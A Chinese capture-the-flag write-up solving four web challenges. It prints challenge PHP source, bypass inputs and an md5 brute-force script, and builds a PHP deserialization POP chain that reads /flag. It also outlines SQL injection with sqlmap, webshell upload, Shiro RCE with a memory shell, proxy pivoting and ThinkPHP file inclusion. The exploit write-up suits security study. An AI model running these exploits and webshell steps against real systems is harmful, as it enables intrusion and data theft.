WEB
0x01 [强网先锋]寻宝
根据题目信息可以知道,需要从中获取两个KEY,然后获得flag
题目源码
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function filter($string){
$filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
$filter_phrase= '/'.implode('|',$filter_word).'/';
return preg_replace($filter_phrase,'',$string);
}
if($ppp){
unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';
extract($_POST);
$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);
if(isset($num1) && is_numeric($num1)){
die("非数字");
}
else{
if($num1 > 1024){
echo "第一层";
if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
echo "第二层";
if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
echo "第三层";
if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
echo "第四层";
if(!isset($num5)||(strlen($num5)==0)) die("no");
$b=json_decode(@$num5);
if($y = $b === NULL){
if($y === true){
echo "第五层";
include 'KeY1lhv.php';
echo $KEY1;
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no111");
}
}
KEY1:
第一层,字符串比较,构造$num1=1027a绕过
第二层,需要绕过 intval() ,使用科学计数法绕过 $num2=6e5
第三层,写脚本跑md5, $num3=61823470
import hashlib
def md5_encode(num3):
return hashlib.md5(num3.encode()).hexdigest()[0:7]
for i in range(60000000,700000000):
num3 = md5_encode(str(i))
# print(num3)
if num3 == '4bf21cd':
print(i)
break
第四层,同样使用科学计数法绕过,构造$num4=0e00000
第五层,利用json_decode在解析非json格式数据的时候会自动置NULL绕过, 构造$num5=aaa
得到KEY1:KEY1{e1e1d3d40573127e9ee0480caf1283d6}
KEY2:
根据题目描述,使用支持自动分片下载的工具下载文件
解压后得到一堆docx文件
随便打开一个发现是一堆字符,猜测KEY2就在其中某一个文件中,写脚本跑
exp
import os
import docx
for i in range(1,20):
for j in range(1,20):
path = "./5.{0}/VR_{1}".format(i,j)
files = os.listdir(path)
# print(filePath)
for file in files:
try:
fileName = path+"/"+file
# print(fileName)
file = docx.Document(fileName)
for content in file.paragraphs:
# print(content.text)
if "KEY2{" in content.text:
print(content.text)
print(fileName)
break
except:
pass
得到KEY2 : KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}
在原页面上提交获取flag:
0x02 [强网先锋]赌徒
根据提示,扫目录在www.zip下得到源码
index.php
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}
?>
分析源码后,发现是php反序列化,构造pop链如下
<?php
error_reporting(1);
class Start
{
public $name='guest';
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag."\n\n";
return ;
}
}
class Info
{
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
$start=new Start();
$info=new Info();
$room=new Room();
$info->file['filename']=$room;
$start->name=$info;
$room->a=$room;
$room->sth_to_set=$start;
echo serialize($room);
?>
base64解码后得到flag(注:前面有个hi,要将其剔除在解码)
0x03 EasyWeb
扫端口发现还有36842开放
登录页面用户名出存在sql注入,sqlmap一把梭,即可获取用户名,密码
登录进后台,扫目录发现上传路由
构造上传,蚁剑连接
使用ew代理出来后扫描端口 ,发现8006开放着jboss服务
获取flag
0x04 Hard_Penetration
shiro rce,注入内存马后使用冰蝎连接,发现当前用户为ctf,无法读取flag,于是使用ew代理出来扫端口,在8005端口有一个php站点,发现为TP3.1.3开发的CMS,审计源码后发现存在文件包含
构造shell去包含
使用蚁剑连接,获得flag
